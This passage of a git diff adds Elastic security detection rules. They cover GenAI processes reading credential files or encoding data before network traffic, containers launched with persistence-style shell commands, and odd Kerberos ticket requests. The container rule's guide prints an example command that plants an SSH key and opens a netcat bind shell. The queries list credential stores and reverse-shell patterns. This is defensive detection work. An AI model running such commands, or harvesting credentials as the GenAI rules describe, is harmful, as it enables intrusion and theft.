environment**\n - If unauthorized:\n - Apply restrictive security groups to block access.\n - Disable public accessibility if enabled.\n - Evaluate whether deletion protection or backup retention is misconfigured.\n\n- **Assess data exposure and intent**\n - Work with data owners to evaluate:\n - The sensitivity of the restored environment.\n - Whether any reads, dumps, or exports occurred post-restore.\n - Whether the restore enabled the attacker to access older or deleted data.\n\n- **Investigate scope and related activity**\n - Review CloudTrail for:\n - Additional restores, exports, or copies.\n - IAM changes allowing expanded privileges.\n - Unusual authentication events or federated sessions without MFA.\n - Related destructive actions (snapshot deletion, backup disabled, instance deletion).\n\n- **Hardening and preventive controls**\n - Enforce least privilege for `rds:RestoreDBInstanceFromDBSnapshot` and `rds:RestoreDBInstanceFromS3`.\n - Use IAM conditions to restrict restore actions by network, principal, or region.\n - Add AWS Config and Security Hub controls for monitoring:\n - Unapproved restores.\n - Public or misconfigured restored instances.\n - Consider SCPs that prevent RDS restores in production accounts except through controlled roles.\n\n- **Post-incident improvements**\n - Rotate credentials for affected IAM users/roles.\n - Update change management processes to ensure restore actions are tracked and approved.\n - Adjust rule exceptions sparingly and ensure high-risk restores continue to generate alerts.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"rds.amazonaws.com\"\n and event.action: (\"RestoreDBInstanceFromDBSnapshot\" or \"RestoreDBInstanceFromS3\")\n and event.outcome: \"success\"\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_RestoreDBInstanceFromDBSnapshot.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_RestoreDBInstanceFromS3.html", + "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation#rds-createdbsnapshot-rds-restoredbinstancefromdbsnapshot-rds-modifydbinstance" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bf1073bf-ce26-4607-b405-ba1ed8e9e204", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Use Case: Asset Visibility", + "Tactic: Defense Evasion", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1578", + "name": "Modify Cloud Compute Infrastructure", + "reference": "https://attack.mitre.org/techniques/T1578/", + "subtechnique": [ + { + "id": "T1578.002", + "name": "Create Cloud Instance", + "reference": "https://attack.mitre.org/techniques/T1578/002/" + }, + { + "id": "T1578.004", + "name": "Revert Cloud Instance", + "reference": "https://attack.mitre.org/techniques/T1578/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 211 + }, + "id": "bf1073bf-ce26-4607-b405-ba1ed8e9e204_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_1.json b/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_1.json new file mode 100644 index 00000000000..ee7862fefe5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_1.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI Process Accessing Sensitive Files", + "note": "## Triage and analysis\n\n### Investigating GenAI Process Accessing Sensitive Files\n\nThis rule detects GenAI tools accessing credential files, SSH keys, browser data, or shell configurations. While GenAI tools legitimately access project files, access to sensitive credential stores is unusual and warrants investigation.\n\n### Possible investigation steps\n\n- Review the GenAI process that triggered the alert to identify which tool is being used and verify if it's an expected/authorized tool.\n- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user.\n- Review the types of sensitive files being accessed (credentials, keys, browser data, etc.) to assess the potential impact of credential harvesting or data exfiltration.\n- Check for other alerts or suspicious activity on the same host around the same time, particularly network exfiltration events.\n- Verify if the GenAI tool or extension is from a trusted source and if it's authorized for use in your environment.\n- Determine if the GenAI process accessed multiple sensitive directories in sequence, an indication of credential harvesting.\n- Check if the GenAI tool recently created or accessed AI agent config files, which may contain instructions enabling autonomous file scanning.\n- Review whether the access was preceded by an MCP server, LangChain agent, or background automation.\n\n### False positive analysis\n\n- Automated security scanning or auditing tools that leverage GenAI may access sensitive files as part of their normal operation.\n- Development workflows that use GenAI tools for code analysis may occasionally access credential files.\n\n### Response and remediation\n\n- Immediately review the GenAI process that accessed the documents to determine if it's compromised or malicious.\n- Review, rotate, and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool.\n- Investigate the document access patterns to determine the scope of potential data exfiltration.\n- Update security policies to restrict or monitor GenAI tool usage in the environment, especially for access to sensitive files.\n", + "query": "file where event.action in (\"open\", \"creation\", \"modification\") and event.outcome == \"success\" and\n\n // GenAI process \n process.name in (\n \"ollama.exe\", \"ollama\", \"Ollama\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"lmstudio.exe\", \"lmstudio\", \"LM Studio\",\n \"claude.exe\", \"claude\", \"Claude\",\n \"cursor.exe\", \"cursor\", \"Cursor\",\n \"copilot.exe\", \"copilot\", \"Copilot\",\n \"codex.exe\", \"codex\",\n \"Jan\", \"jan.exe\", \"jan\",\n \"gpt4all.exe\", \"gpt4all\", \"GPT4All\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\"\n ) and\n\n // Sensitive file paths\n (\n // Persistence via Shell configs\n file.name in (\".bashrc\", \".bash_profile\", \".zshrc\", \".zshenv\", \".zprofile\", \".profile\", \".bash_logout\") or\n\n // Credentials In Files \n file.name like~ \n (\"key?.db\", \n \"logins.json\", \n \"Login Data\", \n \"Local State\",\n \"signons.sqlite\",\n \"Cookies\", \n \"cookies.sqlite\",\n \"Cookies.binarycookies\", \n \"login.keychain-db\", \n \"System.keychain\", \n \"credentials.db\", \n \"credentials\", \n \"access_tokens.db\", \n \"accessTokens.json\", \n \"azureProfile.json\",\n \"RDCMan.settings\", \n \"known_hosts\", \n \"KeePass.config.xml\", \n \"Unattended.xml\")\n )\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0085", + "https://atlas.mitre.org/techniques/AML.T0085.001", + "https://atlas.mitre.org/techniques/AML.T0055", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security", + "https://specterops.io/blog/2025/11/21/an-evening-with-claude-code" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c0136397-f82a-45e5-9b9f-a3651d77e21a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0085", + "Mitre Atlas: T0085.001", + "Mitre Atlas: T0055" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "c0136397-f82a-45e5-9b9f-a3651d77e21a_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3d4e5f6-a7b8-9012-cdef-123456789abc_1.json b/packages/security_detection_engine/kibana/security_rule/c3d4e5f6-a7b8-9012-cdef-123456789abc_1.json new file mode 100644 index 00000000000..cfb3f3273d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c3d4e5f6-a7b8-9012-cdef-123456789abc_1.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when GenAI processes perform encoding or chunking (base64, gzip, tar, zip) followed by outbound network activity. This sequence indicates data preparation for exfiltration. Attackers encode or compress sensitive data before transmission to obfuscate contents and evade detection. Legitimate GenAI workflows rarely encode data before network communications.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-endpoint.events.network-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI Process Performing Encoding/Chunking Prior to Network Activity", + "note": "## Triage and analysis\n\n### Investigating GenAI Process Performing Encoding/Chunking Prior to Network Activity\n\nGenAI processes performing encoding or chunking operations followed by network activity is highly suspicious. This behavior indicates data preparation for exfiltration via GenAI prompts or agents, which is a strong indicator of malicious activity.\n\n### Possible investigation steps\n\n- Review the GenAI process that performed the encoding to identify which tool is running and verify if it's an expected/authorized tool.\n- Examine the encoding/chunking command line arguments to understand what data is being processed.\n- Review the network connection details to identify the destination and determine if it's expected.\n- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user.\n- Review the data that was encoded to determine if it contains sensitive information.\n- Determine whether the encoding was initiated by a GenAI agent or automation loop rather than a user action.\n- Check whether the encoded data size or entropy suggests credential files, browser data, SSH keys, or cloud tokens.\n- Validate that the GenAI tool is installed from a trusted source and has not been modified.\n\n### False positive analysis\n\n- Legitimate data processing workflows that use GenAI tools may trigger this rule if they encode data before transmission.\n- Some local developer workflows may encode files before uploading training data or embeddings; confirm whether the host is a model-development workstation.\n\n### Response and remediation\n\n- Terminate the GenAI process and any spawned encoding/network processes to stop the malicious activity.\n- Review and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool.\n- Investigate the encoded data and network destination to determine the scope of potential data exfiltration.\n", + "query": "sequence by process.entity_id with maxspan=30s\n\n // Encoding/compression followed by network activity\n [process where event.type == \"start\"\n and event.type == \"start\"\n\n // Encoding/chunking tools\n and (\n // Native encoding tools\n process.name in (\"base64\", \"gzip\", \"tar\", \"zip\", \"split\", \"7z\", \"7za\", \"7zr\") or\n \n // PowerShell encoding\n (process.name in (\"powershell.exe\", \"pwsh.exe\") and\n process.command_line like~ (\"*Compress-Archive*\", \"*[Convert]::ToBase64String*\")) or\n \n // Python encoding\n (process.name like~ \"python*\" and\n process.command_line like~ (\"*base64*\", \"*gzip*\", \"*zlib*\", \"*tarfile*\", \"*zipfile*\")) or\n \n // Node.js encoding\n (process.name in (\"node.exe\", \"node\") and\n process.command_line like~ (\"*Buffer.from*\", \"*zlib*\", \"*gzip*\") and\n not process.command_line like~ (\"*mcp*start*\", \"*mcp-server*\", \"*npm exec*mcp*\"))\n )\n\n // GenAI parent process\n and (\n process.parent.name in (\n \"ollama.exe\", \"ollama\", \"Ollama\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"lmstudio.exe\", \"lmstudio\", \"LM Studio\",\n \"claude.exe\", \"claude\", \"Claude\",\n \"cursor.exe\", \"cursor\", \"Cursor\", \"Cursor Helper\", \"Cursor Helper (Plugin)\",\n \"copilot.exe\", \"copilot\", \"Copilot\",\n \"codex.exe\", \"codex\",\n \"Jan\", \"jan.exe\", \"jan\", \"Jan Helper\",\n \"gpt4all.exe\", \"gpt4all\", \"GPT4All\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\"\n ) or\n \n // Node/Deno with GenAI frameworks\n (process.parent.name in (\"node.exe\", \"node\", \"deno.exe\", \"deno\") and\n process.parent.command_line like~ (\n \"*ollama*\", \"*mcp-server*\", \"*@modelcontextprotocol*\", \"*langchain*\", \"*autogpt*\",\n \"*babyagi*\", \"*agentgpt*\", \"*crewai*\", \"*semantic-kernel*\", \"*llama-index*\",\n \"*haystack*\", \"*openai*\", \"*anthropic*\", \"*cohere*\", \"*mistral*\"\n )) or\n \n // Python with GenAI frameworks\n (process.parent.name like~ \"python*\" and\n process.parent.command_line like~ (\n \"*ollama*\", \"*mcp-server*\", \"*langchain*\", \"*autogpt*\", \"*babyagi*\",\n \"*agentgpt*\", \"*crewai*\", \"*semantic-kernel*\", \"*llama-index*\", \"*haystack*\",\n \"*openai*\", \"*anthropic*\", \"*cohere*\", \"*mistral*\"\n ))\n )\n ] by process.entity_id\n\n // Outbound network connection (non-local)\n [network where event.type == \"start\"\n and event.action == \"connection_attempted\"\n and destination.ip != null\n and not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\")\n \n ] by process.entity_id\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0086", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3d4e5f6-a7b8-9012-cdef-123456789abc", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0086" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "c3d4e5f6-a7b8-9012-cdef-123456789abc_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c595363f-52a6-49e1-9257-0e08ae043dbd_1.json b/packages/security_detection_engine/kibana/security_rule/c595363f-52a6-49e1-9257-0e08ae043dbd_1.json new file mode 100644 index 00000000000..8324aee7f98 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c595363f-52a6-49e1-9257-0e08ae043dbd_1.json @@ -0,0 +1,166 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the creation of pods or containers that execute suspicious commands often associated with persistence or privilege escalation techniques. Attackers may use container orchestration tools like kubectl or container runtimes like docker to create pods or containers that run shell commands with arguments that indicate attempts to establish persistence (e.g., modifying startup scripts, creating backdoors).", + "from": "now-9m", + "index": [ + "auditbeat-*", + "endgame-*", + "logs-auditd_manager.auditd-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Pod or Container Creation with Suspicious Command-Line", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Pod or Container Creation with Suspicious Command-Line\n\nThis rule flags pods or containers started via orchestration or runtime tools that immediately execute a shell with commands linked to persistence, privilege changes, or covert I/O (cron, rc.local, sudoers, .ssh, base64, netcat/socat, /tmp). This matters because attackers often spin short\u2011lived workloads to modify startup paths or drop backdoors. Example: kubectl run --restart=Never -- sh -c 'echo ssh-rsa AAAA... >> /root/.ssh/authorized_keys && nc -lvp 4444 -e /bin/sh'.\n\n### Possible investigation steps\n\n- Pivot to Kubernetes audit logs to identify the actor (user or service account), namespace, source IP/workstation, and RBAC context that launched the workload, and validate whether this aligns with approved admin activity.\n- Pull the pod/container spec and image metadata to quickly assess risk indicators like unapproved registry/image, privileged mode, hostNetwork/hostPID, and hostPath or sensitive volume mounts that could mutate the node.\n- Parse the executed command to determine whether it attempts persistence or backdoor setup (editing cron/rc.local, sudoers or authorized_keys, base64 file drops, starting netcat/socat listeners), and verify those changes on the container or node.\n- Correlate runtime and network telemetry for the workload to detect outbound connections or listening ports indicative of reverse shells, and identify destination endpoints and nodes involved.\n- Trace the launcher context by reviewing kubectl client host artifacts (shell history, kubeconfig, IAM/MFA tokens) or CI/CD logs, and check for recent anomalous commits or pipeline runs that could have triggered it.\n\n### False positive analysis\n\n- Administrators performing network troubleshooting or node diagnostics may start ephemeral pods via kubectl run --restart=Never or ad hoc containers with docker/nerdctl that launch sh and use nc/socat/telnet, read /proc, or write to /tmp.\n- Engineers may pass configs or test scripts into a shell using base64/xxd and touch cron, rc.local, /etc/ssh, ~/.ssh, or /etc/profile during validation or break-fix work, producing commands that resemble persistence behavior.\n\n### Response and remediation\n\n- Delete the offending pod/container, revoke the kubeconfig or runtime credentials used to launch it, and quarantine the image and namespace, cordoning the node if privileged, hostNetwork/hostPID, or hostPath were present.\n- Kill any spawned shells or listeners (e.g., sh -c 'nc -lvp ...', socat, telnet) on affected nodes, remove unauthorized firewall/iptables rules, and apply temporary deny-all egress NetworkPolicies to cut C2.\n- Eradicate persistence by restoring clean versions of /etc/cron*, /etc/rc.local, /etc/profile, /etc/sudoers, /etc/ssh/* and deleting unauthorized keys or scripts under /root/.ssh, ~/.ssh, /tmp, /dev/shm, /var/tmp, and hostPath-mounted directories.\n- Rebuild compromised nodes or redeploy workloads with known-good images, rotate cluster secrets and SSH keys, and validate baseline integrity with file hashes and admission scans before returning to service.\n- Escalate to incident response if the actor is unverified or commands touched /etc/shadow or /etc/sudoers, used privileged containers or hostPath to access the host, or opened external connections or listening ports on the node.\n- Harden by enforcing admission controls to deny pods that start /bin/sh or /bin/bash as PID 1, block privileged/hostNetwork/hostPID/hostPath, apply per-namespace egress policies, and restrict RBAC so only approved admins can run kubectl run --restart=Never or docker/nerdctl run.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and (\n (process.name == \"kubectl\" and process.args == \"run\" and process.args == \"--restart=Never\" and process.args == \"--\") or\n (process.name in (\"docker\", \"nerdctl\", \"ctl\") and process.args == \"run\")\n) and \nprocess.args in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and\nprocess.command_line like~ (\n \"*atd*\", \"*cron*\", \"*/etc/rc.local*\", \"*/dev/tcp/*\", \"*/etc/init.d*\", \"*/etc/update-motd.d*\", \"*/etc/ld.so*\", \"*/etc/sudoers*\", \"*base64 *\",\n \"*/etc/profile*\", \"*/etc/ssh*\", \"*/home/*/.ssh/*\", \"*/root/.ssh*\" , \"*~/.ssh/*\", \"*autostart*\", \"*xxd *\", \"*/etc/shadow*\", \"*./.*\",\n \"*import*pty*spawn*\", \"*import*subprocess*call*\", \"*TCPSocket.new*\", \"*TCPSocket.open*\", \"*io.popen*\", \"*os.execute*\", \"*fsockopen*\",\n \"*disown*\", \"* ncat *\", \"* nc *\", \"* netcat *\", \"* nc.traditional *\", \"*socat*\", \"*telnet*\", \"*/tmp/*\", \"*/dev/shm/*\", \"*/var/tmp/*\",\n \"*/boot/*\", \"*/sys/*\", \"*/lost+found/*\", \"*/media/*\", \"*/proc/*\", \"*/var/backups/*\", \"*/var/log/*\", \"*/var/mail/*\", \"*/var/spool/*\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c595363f-52a6-49e1-9257-0e08ae043dbd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + }, + { + "id": "T1609", + "name": "Container Administration Command", + "reference": "https://attack.mitre.org/techniques/T1609/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + }, + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "c595363f-52a6-49e1-9257-0e08ae043dbd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c6b40f4c-c6a9-434e-adb8-989b0d06d005_2.json b/packages/security_detection_engine/kibana/security_rule/c6b40f4c-c6a9-434e-adb8-989b0d06d005_2.json new file mode 100644 index 00000000000..1cc9e34e69c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c6b40f4c-c6a9-434e-adb8-989b0d06d005_2.json @@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Correlates network connections to the standard Kerberos port by an unusual process from the source machine with a Kerberos authentication ticket request from the target domain controller.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*", + "logs-windows.sysmon_operational-*", + "logs-system.security*", + "logs-windows.forwarded*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Kerberos Authentication Ticket Request", + "note": "## Triage and analysis\n\n### Investigating Suspicious Kerberos Authentication Ticket Request\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review events ID 4769 and 4768 for suspicious ticket requests.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Active Directory audit tools.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by source.port, source.ip with maxspan=3s\n [network where host.os.type == \"windows\" and destination.port == 88 and\n process.executable != null and\n not process.executable : \n (\"?:\\\\Windows\\\\system32\\\\lsass.exe\", \n \"\\\\device\\\\harddiskvolume*\\\\windows\\\\system32\\\\lsass.exe\") and\n not (process.executable : (\"C:\\\\Windows\\\\System32\\\\svchost.exe\", \n \"C:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\", \n \"F:\\\\IGEL\\\\RemoteManager\\\\*\\\\bin\\\\tomcat10.exe\") and user.id in (\"S-1-5-20\", \"S-1-5-18\")) and \n source.ip != \"127.0.0.1\" and destination.ip != \"::1\" and destination.ip != \"127.0.0.1\"]\n [authentication where host.os.type == \"windows\" and event.code in (\"4768\", \"4769\")]\n", + "references": [ + "https://github.com/its-a-feature/bifrost", + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 